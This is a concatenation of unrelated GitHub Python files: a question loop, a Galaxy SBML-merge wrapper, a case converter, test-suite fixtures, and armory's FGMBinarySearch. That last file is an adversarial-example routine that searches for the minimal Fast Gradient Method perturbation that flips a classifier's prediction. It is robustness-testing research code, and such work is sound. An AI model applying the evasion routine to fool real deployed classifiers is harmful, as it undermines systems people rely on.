extra=self.info)\n","repo_name":"betcode-org/flumine","sub_path":"flumine/baseflumine.py","file_name":"baseflumine.py","file_ext":"py","file_size_in_byte":17656,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"31"} {"seq_id":"32936293334","text":"qs = [\"What is your name?\", \"What is your age?\" , \n\"What is your height?\" , \n\"What is your gender?\"]\nn=0\nwhile True:\n print(\"Type q to quit\")\n a=input(qs[n])\n if a == \"q\":\n break\n n = (n+1) % len(qs) # This expression cycles the index through the whole list.\n# 1. When n=0, (0+1) % 4 = 1, so the next pass asks the second question.\n# 2. When n=2, (2+1) % 4 = 3, so even the fourth question gets asked.\n# 3. When n=3, (3+1) % 4 = 0, and the loop wraps back to the first question.\n# Using len(qs) instead of a hard-coded 3 keeps the modulus in step with the list,\n# so all four questions take their turn.\n\n# You can change the value of n as you need.","repo_name":"NakshatraCosmo/Projects","sub_path":"while1.py","file_name":"while1.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"37489021672","text":"#!/usr/bin/env python3\n\"\"\"\nCreated on September 21 2019\n\n@author: Melchior du Lac\n@description: Galaxy script to query the rpMergeSBML REST service\n\n\"\"\"\nimport sys\nsys.path.insert(0, '/home/')\nimport argparse\nimport logging\nimport os\nimport rpToolServe\n\n##\n#\n#\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser('Python wrapper to merge two SBML files together. 
The source and target refer to the species and reactions that will be overwritten; the source species are read first and are not overwritten if they already exist in the target SBML')\n parser.add_argument('-sourcefile', type=str)\n parser.add_argument('-inout_format', type=str, choices=['tar', 'sbml'], default='tar')\n parser.add_argument('-target_sbml', type=str)\n parser.add_argument('-output', type=str)\n params = parser.parse_args()\n rpToolServe.main(params.sourcefile,\n params.inout_format,\n params.target_sbml,\n params.output)\n","repo_name":"galaxy-synbiocad/rpMergeSBML","sub_path":"galaxy/code/tool_rpMergeSBML.py","file_name":"tool_rpMergeSBML.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} {"seq_id":"34326851259","text":"\"\"\"\nUpdated version of art.attacks.fast_gradient.py\n\nUses binary search to quickly find optimal epsilon values per test point\n\"\"\"\n\nfrom art.attacks.evasion import FastGradientMethod\nimport numpy as np\n\n\nclass FGMBinarySearch(FastGradientMethod):\n \"\"\"\n Find minimum epsilon perturbations for the given inputs\n\n Uses binary search, up to given tolerance.\n\n Uses self.eps for the maximum value to consider when searching\n Uses self.eps_step for the tolerance for result granularity\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.set_params(minimal=True)\n\n def _minimal_perturbation_binary_batch(self, batch, batch_labels, adv_batch=None):\n \"\"\"\n Iteratively compute the minimal perturbation necessary to make the\n class prediction change, using binary search.\n\n batch - np array of features for batch (x)\n batch_labels - np array of labels for batch, a 2D array of probabilities (y)\n adv_batch - same shape as batch (x^hat)\n This method returns the adv_batch that is computed for the given x and y\n If adv_batch is None, it creates a new array to return\n Else, it modifies the existing array that is passed in\n\n Returns - computed adv_batch\n \"\"\"\n if adv_batch is None:\n adv_batch = batch.copy()\n batch_classes = np.argmax(batch_labels, axis=1)\n\n # Get perturbation\n mask = None\n perturbation = self._compute_perturbation(batch, batch_labels, mask)\n\n def check_epsilon(i, epsilon):\n adv_batch = self._apply_perturbation(batch[[i]], perturbation[[i]], epsilon)\n adv_pred = self.estimator.predict(adv_batch)\n adv_class = np.argmax(adv_pred, axis=1)\n if self.targeted:\n success = batch_classes[[i]] == adv_class\n else:\n success = batch_classes[[i]] != adv_class\n return success, adv_batch\n\n tolerance = self.eps_step\n for i in range(len(batch)):\n # Assume endpoints are correct\n min_eps = 0\n max_eps = self.eps\n while max_eps - min_eps > tolerance:\n mid_eps = (max_eps + min_eps) / 2\n # print(min_eps, mid_eps, max_eps, tolerance)\n\n success, adv_i = check_epsilon(i, mid_eps)\n if success:\n adv_batch[[i]] = adv_i\n max_eps = mid_eps\n else:\n min_eps = mid_eps\n\n return adv_batch\n\n def _minimal_perturbation_linear_batch(self, batch, batch_labels, adv_batch=None):\n \"\"\"\n Rewrite of inner loop for linear search\n\n batch - np array of features for batch (x)\n batch_labels - np array of labels for batch, a 2D array of probabilities (y)\n adv_batch - same shape as batch (x^hat)\n This method returns the adv_batch that is computed for the given x and y\n If adv_batch is None, it creates a new array to return\n Else, it modifies the existing array that is passed in\n\n 
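Note: self.eps bounds the sweep and self.eps_step sets both the starting epsilon and the increment.\n\n 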
Returns - computed adv_batch\n \"\"\"\n if adv_batch is None:\n adv_batch = batch.copy()\n batch_classes = np.argmax(batch_labels, axis=1)\n adv_classes = batch_classes.copy()\n\n # Get perturbation\n perturbation = self._compute_perturbation(batch, batch_labels)\n\n # Get current predictions\n active = np.arange(len(batch))\n current_eps = self.eps_step\n while active.size > 0 and current_eps <= self.eps:\n # Adversarial crafting\n adv_batch[active] = self._apply_perturbation(\n batch[active],\n perturbation[active],\n current_eps,\n )\n\n # Check for success\n adv_preds = self.estimator.predict(adv_batch[active])\n # adv_preds = self.estimator.predict(adv_batch) # can we pare this down?\n adv_classes[active] = np.argmax(adv_preds, axis=1)\n # If targeted, check to see whether we have hit the target class\n if self.targeted:\n active = np.where(batch_classes != adv_classes)[0]\n else:\n active = np.where(batch_classes == adv_classes)[0]\n current_eps += self.eps_step\n\n return adv_batch\n\n def _minimal_perturbation(self, x, y, mask) -> np.ndarray:\n \"\"\"\n Iteratively compute the minimal perturbation necessary to make the\n class prediction change, using binary search.\n \"\"\"\n if mask is not None:\n raise NotImplementedError(\"non-None mask not implemented\")\n adv_x = x.copy()\n\n # Compute perturbation with implicit batching\n for start in range(0, adv_x.shape[0], self.batch_size):\n end = start + self.batch_size\n self._minimal_perturbation_binary_batch(\n x[start:end],\n y[start:end],\n adv_x[start:end],\n )\n\n return adv_x\n","repo_name":"twosixlabs/armory","sub_path":"armory/art_experimental/attacks/fgm_binary_search.py","file_name":"fgm_binary_search.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"31"} {"seq_id":"7509972177","text":"\"\"\"\nStudent name : Anurag Pareek\nUniversity roll no. 
: 2215000322\nContact : anurag020416@gmail.com\nPurpose : Python program to convert snake case to pascal case\n\"\"\"\n\nstring = input(\"Enter in snake_case : \").split(\"_\")\nfor i in range(len(string)):\n string[i] = string[i].title()\nstring = \"\".join(string)\nprint(string)","repo_name":"krsna016/vacation-pywork","sub_path":"036_snake_pascal_conv.py","file_name":"036_snake_pascal_conv.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} {"seq_id":"8664286231","text":"import pytest\nfrom api import leads, fees, clients_documents\nfrom api import clients\nfrom api import relationships\nfrom api import plans\nfrom api import workflow\nfrom api import contributions\nfrom api import withdrawals\nfrom api import valuations\nfrom api import holdings\nfrom api import quotes\nfrom api import securemessaging\nfrom api import leads_documents\nfrom api import tags\nfrom api import client_dependants\nfrom api import factfind\nfrom api import tasks\nfrom api import imps\nfrom api import models\nfrom dsl.fee_actions import FeeActions\nfrom dsl.lead_activities import AddLeadTask\nfrom dsl.provider_statement import ElectronicImports, ProviderStatement\nfrom dsl.search import SearchPlan, SearchFee, SearchClient\nfrom dsl.plan_actions import PlanActions\nfrom dsl.set_up_needs_and_priorities_questions import *\nfrom dsl.set_up_user_delegation import *\nfrom dsl.cash_receipts import CashReceipts\nfrom dsl.client_activities import ClientActivities\nfrom api.published_apps import *\nfrom dsl.generate_document import GenerateDocument\nfrom dsl.login_to_pfp import LogIn as PFPLogin\nfrom dsl.upload_document import ClientDocuments\nfrom dsl.get_client_quote import GetClientQuote\nfrom dsl.client_opportunities import ClientOpportunities\nfrom dsl.client_service_case import ClientServiceCase\nfrom dsl.advice_planning import PlanningOpportunities\nfrom dsl.rebalance import StartRebalanceCommunication\nfrom dsl.pfp_recommendations import AcceptRecommendation\nimport fakedata\nfrom datetime import datetime\n\n\n# \nfrom dsl.user_tasks import UserTasks\nfrom ioffice.income.statement_search import StatementSearchPage\n\n\n@pytest.fixture\ndef api_create_client(config):\n client = clients.create_client(config)\n utils.add_temp_data(config, \"client\", client)\n\n\n@pytest.fixture\ndef api_search_default_client_and_save_details(config):\n client_details = clients.search_client(config, get_common_data(config)[\"clients\"][\"default\"][\"lastname\"])\n utils.add_temp_data(config, \"client\", {\"id\": client_details[\"items\"][0][\"partyId\"],\n \"name\": client_details[\"items\"][0][\"party\"][\"name\"]})\n config.access_token = None\n\n\n@pytest.fixture\ndef api_search_pfp_imps_client_and_save_details(config):\n client_details = clients.search_client(config, get_common_data(config)[\"clients\"][\"pfp_imps_client\"][\"lastname\"])\n utils.add_temp_data(config, \"client\", {\"id\": client_details[\"items\"][0][\"partyId\"],\n \"name\": client_details[\"items\"][0][\"party\"][\"name\"]})\n config.access_token = None\n\n\n@pytest.fixture\ndef api_create_lead(config):\n lead = leads.create_lead(config)\n utils.add_temp_data(config, \"lead\", lead)\n\n\n@pytest.fixture\ndef api_delete_lead(config):\n yield\n leads.delete_lead(config, utils.get_temp_data(config, \"lead\")['id'])\n\n\n@pytest.fixture\ndef api_add_lead_address(config):\n lead = get_temp_data(config, \"lead\")\n address = leads.add_address_for_lead(config, lead[\"id\"])\n 
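# stash the new address so the test (and any teardown) can look it up later\n 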
utils.add_temp_data(config, \"address\", address)\n\n\n@pytest.fixture\ndef api_add_client_address(config):\n client = get_temp_data(config, \"client\")\n address = clients.add_address_for_client(config, client[\"id\"])\n utils.add_temp_data(config, \"address\", address)\n\n\n@pytest.fixture\ndef api_create_client_relationship(config):\n client_list = get_temp_data_collection(config, \"client\")\n client_relationship = relationships.create_relationships_for_client(config, client_list[0][\"id\"], client_list[1][\"id\"])\n add_temp_data(config, \"client_relationship\", client_relationship)\n\n\n@pytest.fixture\ndef api_create_employee_relationship(config):\n client_list = get_temp_data_collection(config, \"client\")\n client_relationship = relationships.create_relationships_for_client(config, client_list[0][\"id\"], client_list[1][\"id\"],\n \"Employee\")\n add_temp_data(config, \"client_relationship\", client_relationship)\n\n\n@pytest.fixture\ndef api_create_corporate_client(config):\n client = clients.create_corporate_client(config)\n add_temp_data(config, \"client\", client)\n\n\n@pytest.fixture\ndef api_create_client_fee(config):\n client = get_temp_data(config, \"client\")\n fee = fees.create_fee_for_client(config, client[\"id\"])\n utils.add_temp_data(config, \"fee\", fee)\n\n\n@pytest.fixture\ndef api_install_uninstall_app(config):\n install_app(config, config.variables[\"environments\"][config.env][\"data\"][\"automation_test_app\"][\"app_id\"])\n yield\n uninstall_app(config, config.variables[\"environments\"][config.env][\"data\"][\"automation_test_app\"][\"app_id\"])\n\n\n@pytest.fixture\ndef api_delete_plan(config):\n yield\n client = get_temp_data(config, \"client\")\n plan = get_temp_data(config, \"plan\")\n plans.change_plan_status_to(config, client[\"id\"], plan[\"id\"], \"Deleted\")\n\n\n@pytest.fixture\ndef api_delete_clients_plans(config):\n yield\n clients_list = utils.get_temp_data_collection(config, \"client\")\n for client in clients_list:\n plans_list = plans.get_plans_for_a_client(config, client[\"id\"])\n for plan in plans_list[\"items\"]:\n plans.change_plan_status_to(config, client[\"id\"], plan[\"id\"], \"Deleted\")\n\n\n@pytest.fixture\ndef api_delete_sub_plan(config):\n yield\n client = get_temp_data(config, \"client\")\n plans.change_plan_status_to(config, client[\"id\"], config.sub_plan_id, \"Deleted\")\n\n\n@pytest.fixture\ndef api_change_plan_status_to_compliance_sign_off(config):\n plan = get_temp_data(config, \"plan\")\n plans.change_plan_status_to(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], \"Compliance Sign off\")\n\n\n@pytest.fixture\ndef api_change_plan_status_to_submitted_to_provider(config):\n plan = get_temp_data(config, \"plan\")\n plans.change_plan_status_to(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], \"Submitted to Provider\")\n\n\n@pytest.fixture\ndef api_delete_workflow(config):\n yield\n workflow.delete_workflow(config, config.workflow_id)\n\n\n@pytest.fixture\ndef api_archive_workflow(config):\n yield\n workflow.change_workflow_status_to(config, config.workflow_id, \"Archived\")\n\n\n@pytest.fixture\ndef api_create_workflow_category(config):\n workflow_category = workflow.create_workflow_category(config)\n utils.add_temp_data(config, \"workflow_category\", workflow_category)\n\n\n@pytest.fixture\ndef api_delete_category(config):\n yield\n workflow_category = get_temp_data(config, \"workflow_category\")\n workflow.delete_category(config, workflow_category[\"templateCategoryId\"])\n\n\n@pytest.fixture\ndef 
api_delete_plans_contributions(config):\n yield\n client = get_temp_data(config, \"client\")\n contributions_list = utils.get_temp_data_collection(config, \"contribution\")\n for contribution in contributions_list:\n contributions.delete_contribution(config, client[\"id\"], contribution[\"plan\"][\"id\"], contribution[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_plans_withdrawals(config):\n yield\n client = get_temp_data(config, \"client\")\n withdrawals_list = utils.get_temp_data_collection(config, \"withdrawal\")\n for withdrawal in withdrawals_list:\n withdrawals.delete_withdrawal(config, client[\"id\"], withdrawal[\"plan\"][\"id\"], withdrawal[\"id\"])\n\n\n@pytest.fixture\ndef api_create_joint_client(config):\n first_client = clients.create_client(config)\n utils.add_temp_data(config, \"client\", first_client)\n second_client = clients.create_client(config)\n utils.add_temp_data(config, \"client\", second_client)\n client_relationship = relationships.create_relationships_for_client(config, first_client[\"id\"], second_client[\"id\"])\n add_temp_data(config, \"client_relationship\", client_relationship)\n\n\n@pytest.fixture\ndef api_delete_client_relationship(config):\n yield\n client = get_temp_data(config, \"client\")\n client_relationship = get_temp_data(config, \"client_relationship\")\n relationships.delete_relationship_for_client(config, client[\"id\"], client_relationship[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_documents(config):\n yield\n client = get_temp_data(config, \"client\")\n client_documents = clients_documents.get_client_documents(config, client[\"id\"])\n for document in client_documents[\"items\"]:\n clients_documents.delete_client_document(config, client[\"id\"], document[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_lead_documents(config):\n yield\n lead = get_temp_data(config, \"lead\")\n lead_documents = leads_documents.get_leads_documents(config, lead[\"id\"])\n for document in lead_documents[\"items\"]:\n leads_documents.delete_leads_document(config, lead[\"id\"], document[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_lead_relationship(config):\n yield\n lead = get_temp_data(config, \"lead\")\n lead_relationship = get_temp_data(config, \"lead_relationship\")\n relationships.delete_relationship_for_lead(config, lead[\"id\"], lead_relationship[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_second_life_documents(config):\n yield\n client_id_second_life = get_temp_data(config, \"client\", 1)[\"id\"]\n client_documents = clients_documents.get_client_documents(config, client_id_second_life)\n for document in client_documents[\"items\"]:\n clients_documents.delete_client_document(config, client_id_second_life, document[\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_plans(config):\n yield\n client = get_temp_data(config, \"client\")\n plans_list = plans.get_plans_for_a_client(config, client[\"id\"])\n for plan in plans_list[\"items\"]:\n plans.change_plan_status_to(config, client[\"id\"], plan[\"id\"], \"Deleted\")\n\n\n@pytest.fixture\ndef api_create_client_quote(config):\n client = get_temp_data(config, \"client\")\n quote = quotes.create_quote(config, client[\"id\"])\n add_temp_data(config, \"quote\", quote)\n\n\n@pytest.fixture\ndef api_set_quote_status_to_complete(config):\n client = get_temp_data(config, \"client\")\n quote = get_temp_data(config, \"quote\")\n quotes.set_quote_status(config, client[\"id\"], quote[\"id\"], \"Complete\")\n\n\n@pytest.fixture\ndef api_create_client_quote_result(config):\n client = get_temp_data(config, 
\"client\")\n quote = get_temp_data(config, \"quote\")\n quote_result = quotes.create_quote_result(config, client[\"id\"], quote[\"id\"])\n add_temp_data(config, \"quote_result\", quote_result)\n\n\n@pytest.fixture\ndef api_create_client_joint_quote_result(config):\n quote = get_temp_data(config, \"quote\")\n quote_result = quotes.create_quote_result(config, get_temp_data(\n config, \"client\", 0)[\"id\"], quote[\"id\"], get_temp_data(config, \"client\", 1)[\"id\"])\n add_temp_data(config, \"quote_result\", quote_result)\n\n\n@pytest.fixture\ndef api_upload_documents_to_quote(config):\n client = get_temp_data(config, \"client\")\n quote = get_temp_data(config, \"quote\")\n clients_documents.create_client_quote_document(config, client[\"id\"], quote[\"id\"])\n clients_documents.upload_client_document(config.document_location, open(utils.get_test_documents_file_url(\n \"Test Automation Quote Document.pdf\"),'rb'))\n return config\n\n\n@pytest.fixture\ndef api_upload_documents_to_quote_result(config):\n client = get_temp_data(config, \"client\")\n quote_result = get_temp_data(config, \"quote_result\")\n clients_documents.create_client_quote_result_document(config, client[\"id\"], quote_result[\"id\"])\n clients_documents.upload_client_document(config.document_location, open(\n utils.get_test_documents_file_url(\"Test Automation Quote Result Document.pdf\"), 'rb'))\n\n\n@pytest.fixture\ndef api_upload_quote_documents_to_joint_client(config):\n clients_documents.create_client_quote_document(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"quote\")\n [\"id\"])\n clients_documents.create_client_quote_document(config, get_temp_data(config, \"client\", 1)[\"id\"], get_temp_data(config,\n \"quote\")[\"id\"])\n\n\n@pytest.fixture\ndef api_upload_quote_result_documents_to_joint_client(config):\n clients_documents.create_client_quote_result_document(config, get_temp_data(config, \"client\")[\"id\"],\n get_temp_data(config, \"quote_result\")[\"id\"])\n clients_documents.create_client_quote_result_document(config, get_temp_data(config, \"client\", 1)[\"id\"],\n get_temp_data(config, \"quote_result\")[\"id\"])\n return config\n\n\n@pytest.fixture\ndef api_upload_client_document(config):\n clients_documents.create_client_document(config, get_temp_data(config, \"client\")[\"id\"])\n clients_documents.upload_client_document(config.document_location,\n open(utils.get_test_documents_file_url(\"UploadDocument.pdf\"), 'rb'))\n\n\n@pytest.fixture\ndef api_create_pre_existing_wrap_plan(config):\n config.plan_wrap = {\"policyNumber\": fakedata.rand_int(5), \"startsOn\": datetime.now().strftime(\"%Y-%m-%d\"),\n \"planType\": {\"name\": \"Wrap\"}}\n plan = plans.create_plan(config, get_temp_data(config, \"client\")[\"id\"], \"pension\", True, config.plan_wrap)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_pre_existing_pension_plan(config):\n config.plan = {\"policyNumber\": fakedata.rand_int(5)}\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"pension\", True, config.plan)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_mortgage_plan(config):\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"mortgage\")\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_investment_plan(config):\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"investment\")\n 
utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_sipp_plan(config):\n config.plan = {\"planType\": {\"name\": \"SIPP\"}}\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"pension\", False, config.plan)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_pre_existing_investment_plan(config):\n config.plan = {\"policyNumber\": fakedata.rand_int(5)}\n client = get_temp_data(config, \"client\")\n plan = plans.create_plan(config, client[\"id\"], \"investment\", True, config.plan)\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_pre_existing_investment_plan_for_all_clients(config):\n clients_list = get_temp_data_collection(config, \"client\")\n for client in clients_list:\n plan = plans.create_plan(config, client[\"id\"], \"investment\", True, {\"policyNumber\": fakedata.rand_int(5)})\n utils.add_temp_data(config, \"plan\", plan)\n\n\n@pytest.fixture\ndef api_create_contribution(config):\n plan = get_temp_data(config, \"plan\")\n contribution = contributions.create_contribution(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"contribution\", contribution)\n\n\n@pytest.fixture\ndef api_create_withdrawal(config):\n plan = get_temp_data(config, \"plan\")\n withdrawal = withdrawals.create_withdrawal(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"withdrawal\", withdrawal)\n\n\n@pytest.fixture\ndef api_create_valuation_for_client_plans(config):\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n valuation = valuations.create_valuation(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], fakedata.rand_int(4))\n utils.add_temp_data(config, \"valuation\", valuation)\n\n\n@pytest.fixture\ndef api_create_fund(config):\n plan = get_temp_data(config, \"plan\")\n fund_holding = holdings.create_fund_holding(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"fund_holding\", fund_holding)\n\n\n@pytest.fixture\ndef api_create_fund_for_all_plans(config):\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n fund_holding = holdings.create_fund_holding(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"fund_holding\", fund_holding)\n\n\n@pytest.fixture\ndef api_create_fund_for_sub_plan(config):\n plan = get_temp_data(config, \"plan\", 1)\n fund_holding = holdings.create_fund_holding(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n utils.add_temp_data(config, \"fund_holding\", fund_holding)\n\n\n@pytest.fixture\ndef api_create_joint_client_quote(config):\n first_life = clients.create_client(config)\n utils.add_temp_data(config, \"client\", first_life)\n second_life = clients.create_client(config)\n utils.add_temp_data(config, \"client\", second_life)\n client_relationship = relationships.create_relationships_for_client(config, first_life[\"id\"], second_life[\"id\"])\n add_temp_data(config, \"client_relationship\", client_relationship)\n quote = quotes.create_quote(config, first_life[\"id\"])\n utils.add_temp_data(config, \"quote\", quote)\n quotes.add_second_life_to_quote(config, second_life[\"id\"], quote[\"id\"])\n\n\n@pytest.fixture\ndef api_send_secure_message(config):\n secure_message = securemessaging.create_secure_message(config)\n add_temp_data(config, \"secure_message\", secure_message)\n securemessaging.send_secure_message(config, 
secure_message[\"messageId\"])\n\n\n@pytest.fixture\ndef api_delete_client_tag(config):\n yield\n tags.delete_tag_for_client(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"tag\")[\"tag\"])\n\n\n@pytest.fixture\ndef api_add_delete_client_goal(config):\n goal = factfind.create_client_goal(config, get_temp_data(config, \"client\")[\"id\"])\n utils.add_temp_data(config, \"goal\", goal)\n yield\n factfind.delete_client_goal(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"goal\")[\"goalId\"])\n\n\n@pytest.fixture\ndef api_create_task(config):\n client = get_temp_data(config, \"client\")\n task = tasks.create_task(config, client[\"id\"])\n utils.add_temp_data(config, \"task\", task)\n\n\n@pytest.fixture\ndef api_delete_client_address(config):\n yield\n client_address = clients.get_addresses_for_client(config, get_temp_data(config, \"client\")[\"id\"])\n update_temp_data(config, \"client\", 0, \"client_address\", client_address)\n clients.delete_address_for_client(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"client\")[\"client_address\"][\"items\"][0][\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_employment(config):\n yield\n client_employment = clients.get_employment_for_client(config, get_temp_data(config, \"client\")[\"id\"])\n update_temp_data(config, \"client\", 0, \"client_employment\", client_employment)\n clients.delete_employment_for_client(config, get_temp_data(config, \"client\")[\"id\"], client_employment['items'][0][\"id\"])\n\n\n@pytest.fixture\ndef api_delete_client_contact(config):\n yield\n client_contact = clients.get_contacts_for_client(config, get_temp_data(config, \"client\")[\"id\"])\n update_temp_data(config, \"client\", 0, \"client_contacts\", client_contact)\n clients.delete_contact_for_client(config, get_temp_data(config, \"client\")[\"id\"], get_temp_data(config, \"client\")[\"client_contacts\"][\"items\"][0][\"id\"])\n\n\n@pytest.fixture\ndef api_add_client_contact(config):\n contact = clients.add_contact_for_client(config, get_temp_data(config, \"client\")[\"id\"], \"Mobile\")\n utils.add_temp_data(config, \"client_contacts\", contact)\n\n\n@pytest.fixture\ndef api_delete_fund_proposal_for_all_plans(config):\n yield\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n holdings.delete_fundproposal_for_plan(config, plan[\"owners\"][0][\"id\"], plan[\"id\"])\n\n\n@pytest.fixture\ndef api_create_active_imps_model(config):\n imps_model = imps.create_model_portfolio(config)\n utils.add_temp_data(config, \"imps_model\", imps_model)\n imps.accept_model_portfolio(config, imps_model[\"id\"])\n\n\n@pytest.fixture\ndef api_add_imps_model_to_fund_proposal_for_all_plans(config):\n imps_models = models.get_portfolio_models(config)[\"items\"]\n active_imps_model = utils.find_active_model_by_code(imps_models, utils.get_temp_data(config, \"imps_model\")[\"code\"])\n utils.add_temp_data(config, \"portfolio_model\", active_imps_model)\n plans_list = get_temp_data_collection(config, \"plan\")\n for plan in plans_list:\n fund_proposal = holdings.add_model_to_plan_fundproposal(config, plan[\"owners\"][0][\"id\"], plan[\"id\"], active_imps_model[\"id\"])\n add_temp_data(config, \"fund_proposal\", fund_proposal)\n\n\n@pytest.fixture\ndef api_deactivate_portfolio_model(config):\n yield\n models.deactivate_portfolio_model(config, utils.get_temp_data(config, \"portfolio_model\")[\"id\"])\n\n# \n\n# \n\n\n@pytest.fixture\ndef ui_delete_fee(config):\n yield\n 
SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"change_plan_status_data\"][\"deleted\"])\n\n\n@pytest.fixture\ndef ui_login_logout(config):\n LogIn(config).navigate_to_login_page().login().assert_user_logged_in()\n yield\n LogIn(config).logout()\n\n\n@pytest.fixture\ndef ui_login(config):\n LogIn(config).navigate_to_login_page().login().assert_user_logged_in()\n\n\n@pytest.fixture\ndef ui_logout_login(config):\n yield\n LogIn(config).logout()\n LogIn(config).navigate_to_login_page().login().assert_user_logged_in()\n\n\n@pytest.fixture\ndef ui_delete_needs_priorities_question(config):\n yield\n SetupNeedsAndPrioritiesQuestions(config).navigate_to_needs_questions().delete_question()\n\n\n@pytest.fixture\ndef ui_delete_needs_priorities_answer(config):\n yield\n SetupNeedsAndPrioritiesQuestions(config).open_client_by_url().go_to_fact_find()\\\n .navigate_to_needs_and_priorities_tab().clear_need_and_priorities_answer()\n\n\n@pytest.fixture\ndef ui_delete_risk_tolerance_data(config):\n yield\n SearchClient(config).open_client_by_url()\n CompleteFactFind(config).go_to_fact_find() \\\n .clear_risk_subtab_data() \\\n .clear_risk_replay_subtab_data()\n\n\n@pytest.fixture\ndef ui_delete_plan_tasks(config):\n yield\n SearchPlan(config).open_plan_by_url()\n PlanActions(config).delete_plan_tasks()\n\n\n@pytest.fixture\ndef ui_remove_delegate_from_user_account(config):\n yield\n SearchUser(config).navigate_to_manage_users().find_user()\n SetUpUserDelegation(config).navigate_to_delegate_tab().remove_delegate_from_user_account()\n\n\n@pytest.fixture\ndef ui_remove_factfind_partner(config):\n yield\n CompleteFactFind(config).go_to_fact_find().using_add_remove_partner_wizard().remove_partner()\n\n\n@pytest.fixture\ndef ui_create_client_plan_fee(config):\n ProviderStatement(config).add_plan_and_plan_fee()\n\n\n@pytest.fixture\ndef ui_delete_cash_receipt(config):\n yield\n CashReceipts(config).navigate_to_cash_receipts_search().search_cash_receipt() \\\n .using_cash_receipt_matching_dialog().unmatch_fee().search_cash_receipt().delete_cash_receipt()\n\n\n@pytest.fixture\ndef ui_move_fee_to_cancelled_status(config):\n yield\n SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"fee_data\"][\"fee_cancelled_status\"])\n\n\n@pytest.fixture\ndef ui_move_fee_to_due_status(config):\n SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"fee_data\"][\"fee_due_status\"])\n\n\n@pytest.fixture\ndef ui_delete_statements_on_first_page(config):\n ProviderStatement(config).navigate_to_statement_search().search_statement()\n if StatementSearchPage(config).get_statement_count_on_first_page():\n StatementSearchPage(config).select_result_per_page(\"250\")\n statement_count = StatementSearchPage(config).get_statement_count_on_first_page()\n while statement_count > 0:\n ProviderStatement(config).delete_statements()\n StatementSearchPage(config).click_search()\n statement_count -= 1\n yield\n ProviderStatement(config).navigate_to_statement_search().search_statement()\n if StatementSearchPage(config).get_statement_count_on_first_page():\n StatementSearchPage(config).select_result_per_page(\"250\")\n statement_count = StatementSearchPage(config).get_statement_count_on_first_page()\n while statement_count > 0:\n 
ProviderStatement(config).delete_statements()\n StatementSearchPage(config).click_search()\n statement_count -= 1\n\n\n@pytest.fixture\ndef ui_delete_live_statements(config):\n yield\n ElectronicImports(config).delete_live_statements()\n\n\n@pytest.fixture\ndef ui_delete_imported_statement(config):\n yield\n ElectronicImports(config).delete_imported_statement()\n\n\n@pytest.fixture\ndef ui_delete_client_open_activities(config):\n yield\n SearchClient(config).open_client_by_url()\n ClientActivities(config).navigate_to_client_open_activities().delete_client_open_activities()\n\n\n@pytest.fixture\ndef ui_delete_user_open_tasks(config):\n yield\n UserTasks(config).navigate_to_organiser().delete_user_open_tasks()\n\n\n@pytest.fixture\ndef ui_move_fee_to_draft_status(config):\n yield\n SearchFee(config).open_fee()\n FeeActions(config).open_change_fee_status_dialog().change_fee_status_to(\n get_common_data(config)[\"test_data\"][\"fee_data\"][\"fee_draft_status\"])\n\n\n@pytest.fixture\ndef ui_logout(config):\n yield\n LogIn(config).logout().assert_user_logged_out()\n\n\n@pytest.fixture\ndef ui_clear_document_queue(config):\n yield\n SearchClient(config).open_client_by_url()\n 